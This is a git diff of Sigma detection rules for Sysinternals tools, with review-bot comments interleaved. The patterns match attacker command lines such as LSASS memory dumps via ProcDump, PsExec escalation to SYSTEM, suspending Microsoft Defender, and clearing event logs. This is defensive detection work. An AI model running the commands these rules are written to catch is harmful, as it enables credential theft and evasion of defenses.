@@ -24,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - Product|endswith: AccessChk - - Description|contains: Reports effective permissions - - NewProcessName|endswith: - - \accesschk.exe - - \accesschk64.exe - - OriginalFileName: accesschk.exe + - Product|endswith: AccessChk + - Description|contains: Reports effective permissions + - NewProcessName|endswith: + - \accesschk.exe + - \accesschk64.exe + - OriginalFileName: accesschk.exe selection_cli: - CommandLine|contains: + CommandLine|contains: # These are the most common flags used with this tool. You could add other combinations if needed - 'uwcqv ' - 'kwsu ' - 'qwsu ' diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml index 1d798364d..8662a7354 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml @@ -1,11 +1,10 @@ title: Active Directory Database Snapshot Via ADExplorer id: 9212f354-7775-4e28-9c9f-8f0a4544e664 related: - - id: ef61af62-bc74-4f58-b49b-626448227652 - type: derived + - id: ef61af62-bc74-4f58-b49b-626448227652 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) 
@@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - NewProcessName|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_cli: - CommandLine|contains: snapshot + CommandLine|contains: snapshot condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml index 9ecbf610e..5230de3e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml @@ -1,12 +1,10 @@ title: Suspicious Active Directory Database Snapshot Via ADExplorer id: ef61af62-bc74-4f58-b49b-626448227652 related: - - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 - type: derived + - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database to a suspicious - directory. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) 
@@ -23,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - NewProcessName|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_flag: - CommandLine|contains: snapshot + CommandLine|contains: snapshot selection_paths: - CommandLine|contains: + CommandLine|contains: + # TODO: Add more suspicious paths - \Downloads\ - \Users\Public\ - \AppData\ diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml index 14d5d60d2..eb05f5d9f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml @@ -1,11 +1,10 @@ title: Potential Execution of Sysinternals Tools id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived status: test -description: Detects command lines that contain the 'accepteula' flag which could - be a sign of execution of one of the Sysinternals tools +description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -accepteula' - ' /accepteula' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml index 9c21d6efe..2399be169 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml @@ -16,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - NewProcessName|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe condition: process_creation and selection falsepositives: - Administration and debugging activity (must be investigated) diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml index 8eab07786..bc668c586 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml @@ -1,8 +1,7 @@ title: Kernel Memory Dump Via LiveKD id: c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2 status: experimental -description: Detects execution of LiveKD with the "-m" flag to potentially dump the - kernel memory +description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory references: - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd - https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/ @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - NewProcessName|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /m' - ' -m' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml index beb6ac757..cf9b65e5e 100644 
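Review bot: `selection_cli` uses `CommandLine|contains|all` over `' /m'` and `' -m'`, which requires both spellings of the flag on one command line; a real invocation uses one or the other, so with `all of selection_*` the rule would not fire on a plain `-m` or `/m` run. Unless both forms are genuinely expected together, this should be `CommandLine|contains:` so either spelling matches. The commit only re-indents these lines, so the modifier was carried over unchanged rather than introduced here.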
--- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \procdump.exe - \procdump64.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml index f2ebc6d42..1715fc2b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml @@ -1,8 +1,7 @@ title: Potential SysInternals ProcDump Evasion id: 79b06761-465f-4f88-9ef2-150e24d3d737 status: test -description: Detects uses of the SysInternals ProcDump utility in which ProcDump or - its output get renamed, or a dump file is moved or copied to a different name +description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name references: - https://twitter.com/mrd0x/status/1480785527901204481 author: Florian Roth (Nextron Systems) 
@@ -20,24 +19,23 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - copy procdump - move procdump selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '.dmp ' - CommandLine|contains: + CommandLine|contains: - 2.dmp - lsass - out.dmp selection_3: - CommandLine|contains: - - copy lsass.exe_ - - move lsass.exe_ + CommandLine|contains: + - copy lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp + - move lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp condition: process_creation and (1 of selection_*) falsepositives: - - False positives are expected in cases in which ProcDump just gets copied to - a different directory without any renaming + - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml index c6b6daf4d..49f0c441d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml 
@@ -1,13 +1,9 @@ title: Potential LSASS Process Dump Via Procdump id: 5afee48e-67dd-4e03-a783-f74259dcf998 status: stable -description: 'Detects suspicious uses of the SysInternals Procdump utility by using - a special command line parameter in combination with the lsass.exe process. - - This way we are also able to catch cases in which the attacker has renamed the - procdump executable. - - ' +description: | + Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. + This way we are also able to catch cases in which the attacker has renamed the procdump executable. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -27,11 +23,11 @@ detection: EventID: 4688 Channel: Security selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_process: - CommandLine|contains: ' ls' + CommandLine|contains: ' ls' # Short for lsass condition: process_creation and (all of selection*) falsepositives: - Unlikely, because no one should dump an lsass process memory diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml index 0194ffbaa..1d237ac50 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \psexec.exe - - OriginalFileName: psexec.c + - NewProcessName|endswith: \psexec.exe + - OriginalFileName: psexec.c condition: process_creation and selection falsepositives: - Administrative scripts. 
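Review bot: The new `# Short for lsass` comment on `CommandLine|contains: ' ls'` understates what the pattern does: it is a prefix match that also fires on any argument starting with `ls`, so the comment should record why the short form was chosen and what keeps it narrow. Suggested wording: `# Deliberately short prefix of "lsass" so truncated or renamed-target variants still match; the ' -ma '/' /ma ' selection keeps this from being noisy`. The falsepositives entry could reference the same trade-off instead of only saying "Unlikely".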
diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml index de6896bb5..9fbc32e57 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml @@ -1,11 +1,10 @@ title: PsExec/PAExec Escalation to LOCAL SYSTEM id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 related: - - id: 207b0396-3689-42d9-8399-4222658efc99 - type: similar + - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags + type: similar status: test -description: Detects suspicious commandline flags used by PsExec and PAExec to escalate - a command line to LOCAL_SYSTEM rights +description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -23,8 +22,12 @@ detection: process_creation: EventID: 4688 Channel: Security - selection_sys: - CommandLine|contains: + selection_sys: # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' @@ -35,6 +38,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -45,6 +49,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' 
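Review bot: The added `# PowerShell (For PowerShell 5)` comment in selection_sys is imprecise: the `powershell` strings match Windows PowerShell (powershell.exe, 5.1 and earlier) while `pwsh` is PowerShell 7+, so `# Windows PowerShell (powershell.exe, 5.1 and earlier)` and `# PowerShell 7+ (pwsh.exe)` would name what the strings actually cover. The header note `"cmd" can be replaced by "powershell", "pwsh" or any other console like software` also overstates the selection, which enumerates only cmd, pwsh and powershell; either say the list is intentionally limited to those three or drop "any other console like software". The same comment block is duplicated in selection_flags_1 of proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml (its `@@ -24,7 +23,12 @@` hunk) and should be corrected there as well. Both selections continue in the following hunks of each file.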
@@ -56,15 +61,13 @@ detection: - ' -i /s powershell' - ' /i -s powershell' selection_other: - CommandLine|contains: + CommandLine|contains: - psexec - paexec - accepteula condition: process_creation and (all of selection_*) falsepositives: - - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance - purposes (rare) - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml index cd1a3a609..618d44367 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml @@ -1,8 +1,7 @@ title: Potential PsExec Remote Execution id: ea011323-7045-460b-b2d7-0f7442ea6b38 status: test -description: Detects potential psexec command that initiate execution on a remote - systems via common commandline flags used by the utility +description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ 
@@ -20,7 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # Accepting EULA in commandline - often used in automated attacks + CommandLine|contains|all: - accepteula - ' -u ' - ' -p ' diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml index 0290e17d3..1d5b37c52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml @@ -1,11 +1,10 @@ title: PsExec Service Execution id: fdfcbd78-48f1-4a4b-90ac-d82241e368c5 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: obsoletes + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: obsoletes status: test -description: Detects launch of the PSEXESVC service, which means that this system - was the target of a psexec remote execution +description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.youtube.com/watch?v=ro2QuZTIMBM @@ -22,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName: C:\Windows\PSEXESVC.exe - - OriginalFileName: psexesvc.exe + - NewProcessName: C:\Windows\PSEXESVC.exe + - OriginalFileName: psexesvc.exe condition: process_creation and selection falsepositives: - Legitimate administrative tasks diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml index c50042ef9..eeed7739f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml 
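Review bot: The added comment `# Accepting EULA in commandline - often used in automated attacks` sits above `CommandLine|contains|all`, but that selection also requires ` -u ` and ` -p `, so the comment explains only one of the three conditions. Either move it onto the `- accepteula` item or reword it to cover the whole selection, e.g. `# EULA acceptance plus explicit credentials (-u/-p) on one command line, typical of scripted remote execution`. The selection list continues past the end of the hunk.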
@@ -1,13 +1,10 @@ title: PsExec Service Child Process Execution as LOCAL SYSTEM id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: similar + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: similar status: test -description: Detects suspicious launch of the PSEXESVC service on this system and - a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started - a command on this system running it with highest privileges and not only the privileges - of the login user account (e.g. the administrator account) +description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec author: Florian Roth (Nextron Systems) @@ -24,12 +21,11 @@ detection: Channel: Security selection: ParentProcessName: C:\Windows\PSEXESVC.exe - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection falsepositives: - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml index f57606d1d..3227e2c1a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml 
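Review bot: The new `# covers many language settings` comment on `SubjectUserName|contains` claims more than the two substrings deliver and leaves the field mapping unexplained. If, as in a standard 4688 event, SubjectUserName holds only the account name and the authority (`NT AUTHORITY` or its localized form) is in SubjectDomainName, neither `AUTHORI` nor `AUTORI` can ever match and the rule would be silent on every host; this should be confirmed against a sample event and the match moved to SubjectDomainName if so. The comment should also state which localizations are meant, e.g. `# Matches English and the Latin-script localizations that keep the AUTHORI/AUTORI stem; localizations without that stem are not covered`.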
+++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml @@ -1,8 +1,7 @@ title: Suspicious Use of PsLogList id: aae1243f-d8af-40d8-ab20-33fc6d0c55bc status: test -description: Detects usage of the PsLogList utility to dump event log in order to - extract admin accounts and perform account discovery or delete events logs +description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs references: - https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos @@ -24,26 +23,26 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: psloglist.exe - - NewProcessName|endswith: - - \psloglist.exe - - \psloglist64.exe + - OriginalFileName: psloglist.exe + - NewProcessName|endswith: + - \psloglist.exe + - \psloglist64.exe selection_cli_eventlog: - CommandLine|contains: + CommandLine|contains: - ' security' - ' application' - ' system' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -d' - ' /d' - ' -x' - ' /x' - ' -s' - ' /s' - - ' -c' + - ' -c' # Clear event log after displaying - ' /c' - - ' -g' + - ' -g' # Export an event log as an evt file. - ' /g' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml index f154aeff3..46d7bb769 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml 
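Review bot: Only ` -c` and ` -g` in selection_cli_flags receive a comment, which leaves the reader guessing why ` -d`, ` -x` and ` -s` are also treated as suspicious; the style should be consistent, commenting every flag or none. If commenting, the same one-line form fits the rest, e.g. `- ' -d' # Only records from the last n days` and `- ' -x' # Dump extended event data`, with each `/` variant sharing the comment of its `-` twin rather than repeating it. The trailing period on the ` -g` comment is also inconsistent with the ` -c` one.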
@@ -1,8 +1,7 @@ title: Sysinternals PsService Execution id: 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f status: test -description: Detects usage of Sysinternals PsService which can be abused for service - reconnaissance and tampering +description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psservice author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: psservice.exe - - NewProcessName|endswith: - - \PsService.exe - - \PsService64.exe + - OriginalFileName: psservice.exe + - NewProcessName|endswith: + - \PsService.exe + - \PsService64.exe condition: process_creation and selection falsepositives: - Legitimate use of PsService by an administrator diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml index 06a46ea78..1c408ed51 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml @@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Execution id: 48bbc537-b652-4b4e-bd1d-281172df448f related: - - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 - type: similar + - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 + type: similar status: experimental -description: Detects usage of Sysinternals PsSuspend which can be abused to suspend - critical processes +description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes references: - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 
@@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: pssuspend.exe - - NewProcessName|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - NewProcessName|endswith: + - \pssuspend.exe + - \pssuspend64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml index 46d4f82d5..26bef003d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml @@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Suspicious Execution id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 related: - - id: 48bbc537-b652-4b4e-bd1d-281172df448f - type: similar + - id: 48bbc537-b652-4b4e-bd1d-281172df448f # Basic Execution + type: similar status: experimental -description: Detects suspicious execution of Sysinternals PsSuspend, where the utility - is used to suspend critical processes such as AV or EDR to bypass defenses +description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses references: - https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 
@@ -22,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: pssuspend.exe - - NewProcessName|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - NewProcessName|endswith: + - \pssuspend.exe + - \pssuspend64.exe selection_cli: - CommandLine|contains: msmpeng.exe + # Add more interesting/critical processes + CommandLine|contains: msmpeng.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml index e654bfbe9..307b0aa3a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml @@ -1,11 +1,10 @@ title: Potential Privilege Escalation To LOCAL SYSTEM id: 207b0396-3689-42d9-8399-4222658efc99 related: - - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 - type: similar + - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 # PsExec specific rule + type: similar status: test -description: Detects unknown program using commandline flags usually used by tools - such as PsExec and PAExec to start programs with SYSTEM Privileges +description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ 
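Review bot: The added `# Add more interesting/critical processes` above `CommandLine|contains: msmpeng.exe` reads as an open task rather than documentation of the selection, and it does not say what the single value is. Recommend `# TODO: extend with further AV/EDR process names; currently only Microsoft Defender's msmpeng.exe` so both the intent and the known gap are explicit and trackable.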
@@ -24,7 +23,12 @@ detection: EventID: 4688 Channel: Security selection_flags_1: - CommandLine|contains: + # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' @@ -35,6 +39,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -45,6 +50,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' @@ -56,14 +62,14 @@ detection: - ' -i /s powershell' - ' /i -s powershell' filter: - CommandLine|contains: + # This filter exclude strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23 + CommandLine|contains: - paexec - PsExec - accepteula condition: process_creation and (1 of selection_flags_* and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PsExec/PAExec with their software and rename - it, so that it is less embarrassing + - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml index 4da86bd5d..410dd5aca 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml 
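Review bot: The new filter comment `# This filter exclude strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23` has a grammar slip and does not say what the exclusion is for; suggest `# Excludes command lines naming psexec/paexec or accepteula, already covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23; this rule targets renamed or unknown binaries using the same flags`. Since the condition is `1 of selection_flags_* and not filter`, stating in the comment that this rule is the complement of the related one helps maintainers keep the two filter/selection lists in sync.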
@@ -1,9 +1,7 @@ title: Sysmon Configuration Update id: 87911521-7098-470b-a459-9a57fc80bdfd status: test -description: Detects updates to Sysmon's configuration. Attackers might update or - replace the Sysmon configuration with a bare bone one to avoid monitoring without - shutting down the service completely +description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely references: - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: - - \Sysmon64.exe - - \Sysmon.exe - - Description: System activity monitor + - NewProcessName|endswith: + - \Sysmon64.exe + - \Sysmon.exe + - Description: System activity monitor selection_cli: - CommandLine|contains: + CommandLine|contains: - -c - /c condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml index a0d34380e..467c26d60 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml @@ -1,8 +1,7 @@ title: Uninstall Sysinternals Sysmon id: 6a5f68d1-c4b5-46b9-94ee-5324892ea939 status: test -description: Detects the removal of Sysmon, which could be a potential attempt at - defense evasion +description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon author: frack113 
